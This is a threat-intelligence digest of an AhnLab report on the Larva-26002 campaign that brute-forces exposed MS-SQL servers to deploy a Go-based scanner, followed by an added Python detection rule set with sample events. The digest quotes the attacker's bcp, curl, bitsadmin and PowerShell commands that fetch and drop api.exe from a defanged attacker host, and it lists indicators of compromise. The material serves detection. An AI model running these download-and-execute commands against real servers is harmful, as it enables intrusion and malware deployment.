Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002)


AhnLab ASEC reports that the Larva-26002 actor continues to target internet‑exposed, improperly managed MS‑SQL servers and uses the BCP utility or downloaders to create and deploy scanner malware. The latest campaign installs a Go‑based scanner called ICE Cloud Client that authenticates with a C2, receives MSSQL scanning targets and credentials, and reports successful logins back to the server. #Larva26002 #ICECloud

Keypoints

  • Larva-26002 targets exposed MS‑SQL servers using brute force and dictionary attacks against weak account credentials.
  • The actor abuses the MS‑SQL BCP utility to export a stored malware binary from a database table and write it to disk (examples: table “uGnzBdZbsi” and format file “FODsOZKgAU.txt”).
  • Where BCP is not used, the attacker deploys a downloader (api.exe) via curl, bitsadmin, or PowerShell to fetch the ICE Cloud components from hxxp://109.205.211[.]13/api.exe.
  • The api.exe downloader installs ICE Cloud Launcher and then the ICE Cloud Client scanner (both written in Go); the scanner contains Turkish strings and AI‑style emoticons.
  • ICE Cloud Client authenticates with a C2, receives lists of pre‑attack MS‑SQL targets and credentials (e.g., “mssql” protocol and “ecomm/ecomm”), attempts authentication, and reports successful results to the C2.
  • Past Larva-26002 activity included deploying Trigona and Mimic ransomware and installing remote access tools such as AnyDesk and RMM tools like Teramind to maintain access.

MITRE Techniques

  • [T1110] Brute Force – Larva-26002 performs password guessing and dictionary attacks against exposed MS‑SQL accounts (‘brute force attacks and dictionary attacks’).
  • [T1218] Signed Binary Proxy Execution – The actor abuses the MS‑SQL BCP utility to export a stored binary to disk using a command such as ‘bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\api.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"’.
  • [T1105] Ingress Tool Transfer – Scanner/downloader binaries are transferred to victims using HTTP downloaders and utilities (‘curl -o "C:\programdata\api.exe" "hxxp://109.205.211[.]13/api.exe"’, ‘bitsadmin /transfer job1 /download /priority high "hxxp://109.205.211[.]13/api.exe" "C:\programdata\api.exe"’).
  • [T1059.001] PowerShell – PowerShell is used as an alternative method to download and execute the scanner malware (‘Scanner malware download using PowerShell’).
  • [T1021.001] Remote Services: RDP – The actor enables remote control by installing remote access and port‑forwarding tools to allow RDP connections (‘installed AnyDesk for remote control and a port forwarder for RDP connections’).
  • [T1219] Remote Access Software – Legitimate remote access / RMM tools like AnyDesk and Teramind are used to maintain interactive access (‘installed AnyDesk for remote control’ and ‘used Teramind, an RMM tool’).
  • [T1046] Network Service Discovery – The ICE Cloud Client functions as a scanner that enumerates MS‑SQL servers and receives lists of target addresses from the C2 (‘the server sends a list of addresses of pre-attack MS-SQL servers’).
  • [T1071.001] Application Layer Protocol: Web Protocols – ICE Cloud Launcher authentication and the download/request exchanges with the C2 use web protocols to obtain the ICE Cloud Client and send scan results (‘ICE Cloud Launcher authenticates by sending the following packet to the C&C server and then sends a download request to download the scanner, “ICE Cloud Client”’).
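The three execution paths above (BCP `queryout` writing an executable, curl/bitsadmin fetching from a URL, and a PowerShell download) all show up as command lines spawned from the SQL Server process, which is the discriminator a detection engineer would key on. The following rule set is an added example written for this digest, not code from AhnLab ASEC or from the report; the process events are constructed samples (the `sqlservr.exe` path, the `AdventureWorks` export and the `api.example.com` request are invented), and the only values taken from the report are the defanged downloader URL, the table and format-file names, and the ProgramData paths it cites. The mapping of each rule to a technique ID follows the report's own MITRE list.

```python
"""Detection rules for the MS-SQL -> BCP/downloader deployment pattern.

Added example; constructed sample events, not report telemetry.
"""
import re
from dataclasses import dataclass

# Child processes of sqlservr.exe are typically spawned via xp_cmdshell or
# SQLCLR; a download or BCP export under this parent is the high-signal case.
SQL_SERVER_IMAGE = "sqlservr.exe"

# Matches live (http://) and defanged (hxxp://) URLs so the same rule runs on
# raw telemetry and on report-derived sample data.
URL = r"h(?:tt|xx)ps?://"

# (rule name, technique ID as mapped in the report, compiled pattern)
RULES = [
    # bcp "<query>" queryout <path>.exe -f <format file>: raw binary written to disk
    ("bcp_queryout_executable", "T1218",
     re.compile(r"\bbcp(?:\.exe)?\b.*\bqueryout\b.*\.(?:exe|dll)\b", re.I | re.S)),
    # curl / bitsadmin pulling a payload from a URL
    ("curl_bitsadmin_download", "T1105",
     re.compile(r"\b(?:curl|bitsadmin)(?:\.exe)?\b.*" + URL, re.I | re.S)),
    # PowerShell download primitives (assumed heuristic; the report names none)
    ("powershell_download", "T1059.001",
     re.compile(r"\bpowershell(?:\.exe)?\b.*(?:DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b)",
                re.I | re.S)),
]


@dataclass(frozen=True)
class Finding:
    event_index: int
    rule: str
    technique: str
    severity: str  # "high" when spawned under SQL Server, else "medium"


def analyze_events(events):
    """Run every rule over (parent_image, image, command_line) tuples."""
    findings = []
    for i, (parent, _image, cmdline) in enumerate(events):
        under_sql = parent.lower().endswith(SQL_SERVER_IMAGE)
        for name, technique, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(i, name, technique, "high" if under_sql else "medium"))
    return findings


def high_severity(findings):
    return [f for f in findings if f.severity == "high"]


# Constructed sample process-creation events: (parent_image, image, command_line).
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"  # constructed path
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    # 0: BCP export of the stored binary (command shape from the report)
    (SQLSERVR, CMD,
     r'cmd.exe /c bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\api.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"'),
    # 1: curl downloader (command shape from the report, URL defanged)
    (SQLSERVR, CMD, r'cmd.exe /c curl -o "C:\programdata\api.exe" "hxxp://109.205.211[.]13/api.exe"'),
    # 2: bitsadmin downloader (command shape from the report, URL defanged)
    (SQLSERVR, CMD,
     r'cmd.exe /c bitsadmin /transfer job1 /download /priority high "hxxp://109.205.211[.]13/api.exe" "C:\programdata\api.exe"'),
    # 3: PowerShell download (constructed; the report does not quote the command)
    (SQLSERVR, CMD,
     r'''cmd.exe /c powershell -nop -c "(New-Object Net.WebClient).DownloadFile('hxxp://109.205.211[.]13/api.exe','C:\ProgramData\api.exe')"'''),
    # 4: benign DBA export: "out" mode, data file, not under SQL Server
    (r"C:\Windows\explorer.exe", r"C:\Tools\bcp.exe",
     r'bcp.exe AdventureWorks.dbo.Orders out "C:\exports\orders.dat" -T -c'),
    # 5: benign curl from an interactive shell: flagged, but only medium
    (CMD, r"C:\Windows\System32\curl.exe", "curl.exe -o report.json https://api.example.com/health"),
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"event {f.event_index}: {f.rule} [{f.technique}] severity={f.severity}")
```

Events 0 to 3 each produce one high-severity finding; the benign `out`-mode export produces none, and the interactive curl is reported at medium severity only. That split is the point of the parent-process check: download utilities alone are noisy, whereas a `queryout` to an `.exe` or any fetch from a URL with `sqlservr.exe` as the parent is rare enough in normal operation to page on.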

Indicators of Compromise

  • [MD5] Malware sample hashes observed in the report – 0a9f2e2ff98e9f19428da79680e80b77, 28847cb6859b8239f59cbf2b8f194770, and 3 more hashes
  • [URL] Downloader host used to fetch scanner – hxxp://109[.]205[.]211[.]13/api[.]exe
  • [FQDN] Associated domain observed in report – hostroids[.]com
  • [File Name] Deployed filenames and SQL artifacts – C:\ProgramData\api.exe, C:\ProgramData\FODsOZKgAU.txt (and SQL table ‘uGnzBdZbsi’)

Read more: https://asec.ahnlab.com/en/92988/